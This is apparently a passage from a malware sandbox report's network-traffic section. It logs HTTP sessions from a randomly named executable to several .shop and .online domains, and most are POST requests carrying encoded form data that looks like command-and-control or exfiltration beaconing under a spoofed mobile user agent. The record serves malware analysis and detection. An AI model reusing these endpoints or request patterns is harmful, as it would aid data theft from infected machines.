                                                                                                Origin: http://www.asklifeclarity.shop
                                                                                                Referer: http://www.asklifeclarity.shop/b5w1/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 57 78 67 36 44 59 6a 6b 45 50 75 43 6c 51 70 6e 48 74 58 43 59 7a 49 34 46 71 62 36 6f 6f 4a 54 72 73 53 67 79 35 74 6a 64 59 39 47 49 6b 38 4d 75 69 45 49 73 49 36 32 57 47 5a 30 6a 6a 64 61 35 30 70 35 43 6d 43 43 79 4e 42 70 31 6e 56 39 67 64 63 53 63 32 57 54 49 69 6f 55 5a 30 58 4a 59 6f 5a 51 33 7a 56 42 37 4d 44 35 69 45 66 6d 39 75 39 6c 4e 79 75 61 41 2b 5a 53 5a 55 67 4b 6b 2b 46 77 61 51 49 79 42 63 79 66 41 47 6d 57 4c 65 53 6d 77 64 6b 44 70 38 31 4e 72 73 74 56 55 59 61 75 62 55 61 42 71 62 42 6d 50 77 64 6d 43 30 35 6a 31 4f 35 6c 30 42 37 39 72 74 58 37 68 77 54 4c 39 46 39 62 35 42 41 69 36 65 31 65 34 6d 59 64 42 38 73 66 30 52 48 39 48 55 48 43 6a 66 6c 30 45 63 55 79 4c 6b 66 55 68 79 42 53 78 41 6d 49 59 53 4e 70 48 52 2f 7a 59 57 4a 35 73 53 6e 41 5a 41 6d 61 39 6f 73 4b 75 45 39 49 33 41 30 38 4c 7a 50 66 56 73 30 31 77 35 4d 4e 78 61 35 30 53 6e 37 33 66 67 78 6e 4c 70 39 6e 46 31 76 70 63 7a 4a 4f 49 72 2f 6c 71 53 6a 31 4f 41 69 6f 37 2f 43 66 67 73 56 [TRUNCATED]
                                                                                                Data Ascii: ZtyPTl=Wxg6DYjkEPuClQpnHtXCYzI4Fqb6ooJTrsSgy5tjdY9GIk8MuiEIsI62WGZ0jjda50p5CmCCyNBp1nV9gdcSc2WTIioUZ0XJYoZQ3zVB7MD5iEfm9u9lNyuaA+ZSZUgKk+FwaQIyBcyfAGmWLeSmwdkDp81NrstVUYaubUaBqbBmPwdmC05j1O5l0B79rtX7hwTL9F9b5BAi6e1e4mYdB8sf0RH9HUHCjfl0EcUyLkfUhyBSxAmIYSNpHR/zYWJ5sSnAZAma9osKuE9I3A08LzPfVs01w5MNxa50Sn73fgxnLp9nF1vpczJOIr/lqSj1OAio7/CfgsVxz1ys/pqSobtwnnOjmJpbGoBZAuG5PMQg2VeXS5TObre2ldTkU9Cp/ckFpJXrYBsY2UTztHr5r0UDzt91+QbcdWTWkBtAK8sfqhzsc/e8PdGv0rSv8c/YTk5d3pt+2qCHdoy97kTllQl0tFnJw4zxa5JdGb/xgwuq+vuf57SrrNgC/eQE2ZgJjTq5g4Ne4u0CrVJCYowgar42mq6o9wnJTFaBedx6ic63CzR1XBSAf3X7OLiOUYGMeiCdPsM9fMPC9N+w+0vzjOdW4KvEeBVtx1nXcOe6morTi81Qe+jSfi8dyDAM8neCG1at0FMJv8x4gkjVFZokczxk47puTtGXdTcBzf7w7RbflwTCV1HIr5gFqdAC1iBYVGCIFUFM1iX/ddF8dJ1o4PpSKz8SIHvyccqFzZ1sN7cnU2dpCk+7KS0WJNzbCCuoMETqW2rdDqMb7MGlL7Ly130pdU7PgPW5UsApsy+d450FJq4jSIop4l6IgT36ynan0I6ycPF7hwIY9aNtWo7HvQV1jQkQZJNlgPkyDFkcsPcEwM88RHW8+hTsJgUZONeoCGb4GG+AYhkLvyAPGhpCYcbzF1JVnMQbpwHpfkiNSOoMd1uoyO7BaylVagV6eOTpbGLsuGHpAjMehF0NouuFNwUsnb1f8Lx+qwAG2IAhEwMhc [TRUNCATED]


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.45135875.2.103.23802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:35.552815914 CET507OUTGET /b5w1/?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pg HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.asklifeclarity.shop
                                                                                                Connection: close
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Nov 6, 2024 13:42:36.168476105 CET399INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Wed, 06 Nov 2024 12:42:36 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 259
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 74 79 50 54 6c 3d 62 7a 49 61 41 76 2f 43 4e 64 54 38 72 42 39 6e 4c 35 58 43 65 53 39 70 64 4b 79 43 74 6f 45 36 33 4f 75 78 71 4f 67 69 47 6f 68 47 52 30 77 78 67 68 41 54 2b 34 2f 68 54 58 46 42 36 78 64 52 31 57 78 66 4f 57 43 77 31 35 6b 77 73 47 39 37 71 2f 68 56 57 79 47 57 66 52 74 5a 59 58 54 7a 47 65 64 53 72 46 41 5a 33 59 53 6a 2f 45 71 36 71 65 39 69 49 68 59 3d 26 5a 62 77 4c 3d 6a 50 6a 34 57 78 56 50 2d 50 67 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pg"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.451427172.67.163.171802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:49.476861000 CET772OUTPOST /umew/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 203
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.waidzeitcz.shop
                                                                                                Referer: http://www.waidzeitcz.shop/umew/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 64 56 37 32 42 79 53 4f 6d 59 68 39 62 76 63 6a 74 79 59 46 67 37 72 49 33 57 46 72 5a 36 6e 66 4b 70 61 36 38 59 4f 4f 45 71 4b 59 63 74 4c 5a 67 6b 32 64 77 79 36 33 2b 2f 71 33 36 37 59 7a 4a 63 73 67 39 44 44 6a 52 4e 39 46 4d 30 4a 41 4b 72 55 44 2f 6c 70 67 73 44 67 73 2f 52 75 63 6e 51 75 46 6b 39 41 65 36 34 77 73 76 6b 2b 7a 2f 6a 38 4b 56 6b 66 5a 47 47 46 77 62 4d 78 4e 78 77 65 76 76 2f 4e 52 6a 39 63 2f 44 36 77 4e 59 68 70 79 6f 38 6a 32 32 2b 55 63 36 5a 2f 49 4f 66 6d 38 53 4c 72 71 33 67 36 6d 45 74 77 6d 50 70 67 33 2f 7a 42 45 4f 4d 42 76 41 34 58 4a 47 41 3d 3d
                                                                                                Data Ascii: ZtyPTl=dV72BySOmYh9bvcjtyYFg7rI3WFrZ6nfKpa68YOOEqKYctLZgk2dwy63+/q367YzJcsg9DDjRN9FM0JAKrUD/lpgsDgs/RucnQuFk9Ae64wsvk+z/j8KVkfZGGFwbMxNxwevv/NRj9c/D6wNYhpyo8j22+Uc6Z/IOfm8SLrq3g6mEtwmPpg3/zBEOMBvA4XJGA==


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.451428172.67.163.171802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:52.107367039 CET792OUTPOST /umew/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 223
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.waidzeitcz.shop
                                                                                                Referer: http://www.waidzeitcz.shop/umew/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 64 56 37 32 42 79 53 4f 6d 59 68 39 62 4b 55 6a 72 56 4d 46 6f 37 72 4a 72 6d 46 72 54 61 6e 62 4b 6f 6d 36 38 63 32 65 45 38 79 59 64 4d 58 5a 68 6e 75 64 33 79 36 33 6e 50 71 32 6c 4c 59 74 4a 63 78 56 39 44 50 6a 52 4d 64 46 4d 32 68 41 4e 59 4d 41 35 31 70 59 31 54 67 75 67 42 75 63 6e 51 75 46 6b 39 55 34 36 37 41 73 76 30 4f 7a 2b 42 55 56 63 45 66 57 4f 6d 46 77 66 4d 78 4a 78 77 66 36 76 36 55 36 6a 2f 6b 2f 44 37 41 4e 59 54 42 74 39 4d 69 39 35 65 55 4a 31 4c 53 69 4b 4e 66 47 53 49 7a 51 38 43 6d 35 46 72 68 38 65 59 42 67 74 7a 6c 33 54 4c 49 62 4e 37 71 41 64 49 41 2b 38 68 70 72 47 50 65 2f 38 57 4b 79 6c 44 53 57 4a 45 41 3d
                                                                                                Data Ascii: ZtyPTl=dV72BySOmYh9bKUjrVMFo7rJrmFrTanbKom68c2eE8yYdMXZhnud3y63nPq2lLYtJcxV9DPjRMdFM2hANYMA51pY1TgugBucnQuFk9U467Asv0Oz+BUVcEfWOmFwfMxJxwf6v6U6j/k/D7ANYTBt9Mi95eUJ1LSiKNfGSIzQ8Cm5Frh8eYBgtzl3TLIbN7qAdIA+8hprGPe/8WKylDSWJEA=


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.451429172.67.163.171802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:54.765788078 CET10874OUTPOST /umew/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 10303
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.waidzeitcz.shop
                                                                                                Referer: http://www.waidzeitcz.shop/umew/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Data Raw: 5a 74 79 50 54 6c 3d 64 56 37 32 42 79 53 4f 6d 59 68 39 62 4b 55 6a 72 56 4d 46 6f 37 72 4a 72 6d 46 72 54 61 6e 62 4b 6f 6d 36 38 63 32 65 45 2f 53 59 64 2b 66 5a 67 47 75 64 32 79 36 33 34 2f 71 7a 6c 4c 5a 6f 4a 63 35 52 39 44 7a 5a 52 4a 5a 46 4e 56 5a 41 4d 70 4d 41 33 31 70 59 6f 44 67 72 2f 52 75 4e 6e 55 43 42 6b 39 45 34 36 37 41 73 76 79 71 7a 34 54 38 56 61 45 66 5a 47 47 46 73 62 4d 78 78 78 77 58 71 76 36 59 4d 69 4c 51 2f 47 72 51 4e 61 48 68 74 2f 73 69 2f 74 2b 56 4d 31 4c 65 35 4b 4e 44 37 53 4c 76 36 38 41 36 35 48 64 51 54 4e 36 4a 33 2f 67 42 58 44 5a 52 78 44 72 47 4d 61 4c 59 66 37 79 46 71 64 4c 53 4a 32 58 7a 41 77 43 4b 48 58 52 66 42 72 71 6a 72 4d 4d 56 73 38 72 38 58 4f 44 6c 56 68 31 48 33 32 41 52 56 4b 45 62 58 52 30 4c 6d 6d 4c 45 64 33 72 67 38 73 30 6c 35 74 49 70 6f 72 47 4c 35 6c 30 62 41 46 4f 50 44 31 78 66 47 42 36 6a 51 74 34 74 68 35 4f 53 6d 4b 54 35 2f 51 49 62 4d 4a 42 5a 63 55 61 79 6c 2f 31 67 46 75 57 4d 35 4a 6d 54 70 69 38 5a 39 4b 6f 66 50 41 4b 79 [TRUNCATED]
                                                                                                Data Ascii: ZtyPTl=dV72BySOmYh9bKUjrVMFo7rJrmFrTanbKom68c2eE/SYd+fZgGud2y634/qzlLZoJc5R9DzZRJZFNVZAMpMA31pYoDgr/RuNnUCBk9E467Asvyqz4T8VaEfZGGFsbMxxxwXqv6YMiLQ/GrQNaHht/si/t+VM1Le5KND7SLv68A65HdQTN6J3/gBXDZRxDrGMaLYf7yFqdLSJ2XzAwCKHXRfBrqjrMMVs8r8XODlVh1H32ARVKEbXR0LmmLEd3rg8s0l5tIporGL5l0bAFOPD1xfGB6jQt4th5OSmKT5/QIbMJBZcUayl/1gFuWM5JmTpi8Z9KofPAKy9wxKDFqXrhnuvpfat1g4dw0cKAVcgMEDlD0nY5DJGSBF4cJw1j1oppbVts/bp83tgq7B74EwUNHRThXjqfDaJEkUNFF+AZnDhmdaC/H7thy0qC+dzNrMISUEP/8F+WrXgvNVzAwV12MYF1fwAkjWPExxnZiDEcbiujO4tEUcwoFw/24kmi5Yb0J05+0rmM0hz5KN4Zuw6Hb0SJiPslVGyWBLA3zMF/30hdL3YmIe7rDB+vrk3ugLGn1pTgARPI60GE8C5Xscpn+rTGLVbv6MDx+pwKIna3eODz8cDHh1ErFPS0YrFFsLry3nQHtxLY6dc/VndYi8LfmES0kvam1lGy6tzF9GEq0YY+T32xOJoSAw6xA9llhPIj6Z3XpJwUjNTd9V45IpBGlMwDxLGyOw8qb4DcFm1V9wKbHB1ZcqGoOffUbUuzZGAch03QTKd/jxJGSvzyO8Z3hyDBYtPz8YqAA9qRDv+H0aq6PaxEW94VZRAjSIrGht/fSw/fhTNkzj6zbN2hGaqxdbm9JrhydD917i/lfj6SDbQSqX4tHIAJFT53JhY4wYvabn0oAQ4O+LEu6MqmyNzNa2fIK8MRb3BndsdpK2MzYeqg1B74+gAj54dt8qiq8DrfdUL7bcpLpsRmqc6HcvBWSXJMJjrgshD+390hWsS6fSa9 [TRUNCATED]


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                8192.168.2.451430172.67.163.171802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:42:57.333697081 CET503OUTGET /umew/?ZtyPTl=QXTWCFaCrqsBcZ0jvGl1ttfHxXcpVNWda4HOn4zcEeaqQvbbnXannTD248WElJ9FFMtE83bbHMtecG5XDZ8D8EJV2R1Y4Xui2kuIw8EG0Z1Ay2DF3ANMa14=&ZbwL=jPj4WxVP-Pg HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.waidzeitcz.shop
                                                                                                Connection: close
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
                                                                                                Nov 6, 2024 13:42:59.693639040 CET1236INHTTP/1.1 404 Not Found
                                                                                                Date: Wed, 06 Nov 2024 12:42:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Vary: Accept-Encoding
                                                                                                X-Powered-By: PHP/8.2.19
                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                Link: <https://www.waidzeitcz.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLF1EiCwzp0ip6TLXPZbsx%2FOX7C8UYiqG3GfV0vU5hz3fFNUDNMcl733jJu8e%2FuBmEnjfqgSJRDOBBV9Ou2UFrXWbeUoFad9dv%2Bb3V1ItCdFkrTfh3rNVMvgxHhRF4%2BCSyO1QPAZ"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8de52a9f998b4635-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1072&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=503&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                Data Raw: 37 36 61 34 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 20 6c 61 6e 67 3d 22 63 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                                                                Data Ascii: 76a4<!DOCTYPE html><html lang="cs" prefix="og: https://ogp.me/ns#"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" c
                                                                                                Nov 6, 2024 13:42:59.693726063 CET1236INData Raw: 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f
                                                                                                Data Ascii: ontent="width=device-width, initial-scale=1, minimum-scale=1" /><link rel="profile" href="https://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.waidzeitcz.shop/xmlrpc.php" /><script>document.documentElement.className =
                                                                                                Nov 6, 2024 13:42:59.693737984 CET1236INData Raw: 64 7a 65 69 74 63 7a 2e 73 68 6f 70 2f 23 70 65 72 73 6f 6e 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 63 73 22 7d 2c 7b 22 40 74 79 70 65 22 3a 22 42 72 65 61 64 63 72 75 6d 62 4c 69 73 74 22 2c 22 40 69 64 22 3a 22 23 62 72 65 61 64 63
                                                                                                Data Ascii: dzeitcz.shop/#person"},"inLanguage":"cs"},{"@type":"BreadcrumbList","@id":"#breadcrumb","itemListElement":[{"@type":"ListItem","position":"1","item":{"@id":"https://www.waidzeitcz.shop","name":"Dom\u016f"}}]},{"@type":"WebPage","@id":"#webpage
                                                                                                Nov 6, 2024 13:42:59.694078922 CET636INData Raw: 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f
                                                                                                Data Ascii: \/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.waidzeitcz.shop\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}};/*! Thi
                                                                                                Nov 6, 2024 13:42:59.694092035 CET1236INData Raw: 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67
                                                                                                Data Ascii: ,e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\
                                                                                                Nov 6, 2024 13:42:59.694360018 CET1236INData Raw: 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f
                                                                                                Data Ascii: Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}
                                                                                                Nov 6, 2024 13:42:59.694371939 CET1236INData Raw: 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79
                                                                                                Data Ascii: pemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='porto-sp-attr-table-css' href='http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/shortcodes//assets/cp-attribute-table/attribute-tab
                                                                                                Nov 6, 2024 13:42:59.694382906 CET1236INData Raw: 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63
                                                                                                Data Ascii: r-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0
                                                                                                Nov 6, 2024 13:42:59.694396019 CET1236INData Raw: 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62
                                                                                                Data Ascii: e.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.3
                                                                                                Nov 6, 2024 13:42:59.694407940 CET1236INData Raw: 63 6b 2d 73 74 79 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 72 61 6e 6b 2d 6d 61 74 68 2d 74 6f 63 2d 62 6c 6f 63 6b 20 6e 61 76 20 6f 6c 7b 63 6f 75 6e 74 65 72 2d 72 65 73 65 74 3a 69 74 65 6d 7d 2e 77 70 2d
                                                                                                Data Ascii: ck-style-inline-css'>.wp-block-rank-math-toc-block nav ol{counter-reset:item}.wp-block-rank-math-toc-block nav ol li{display:block}.wp-block-rank-math-toc-block nav ol li:before{content:counters(item, ".") ". ";counter-increment:item}</styl
                                                                                                Nov 6, 2024 13:42:59.698677063 CET1236INData Raw: 61 6e 63 68 6f 72 73 5f 73 74 79 6c 65 5f 74 65 78 74 5f 61 63 74 69 76 65 3a 20 23 41 37 31 34 34 43 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6a 71 75 65 72 79 2d 73
                                                                                                Data Ascii: anchors_style_text_active: #A7144C;}</style><link rel='stylesheet' id='jquery-selectBox-css' href='http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver=1.2.0' media='all' /><link rel='


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                9192.168.2.451431162.0.231.203802332C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 6, 2024 13:43:05.430457115 CET778OUTPOST /uftp/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.windowmart.online
                                                                                                Connection: close
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Content-Length: 203
                                                                                                Cache-Control: no-cache
                                                                                                Origin: http://www.windowmart.online
                                                                                                Referer: http://www.windowmart.online/uftp/
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
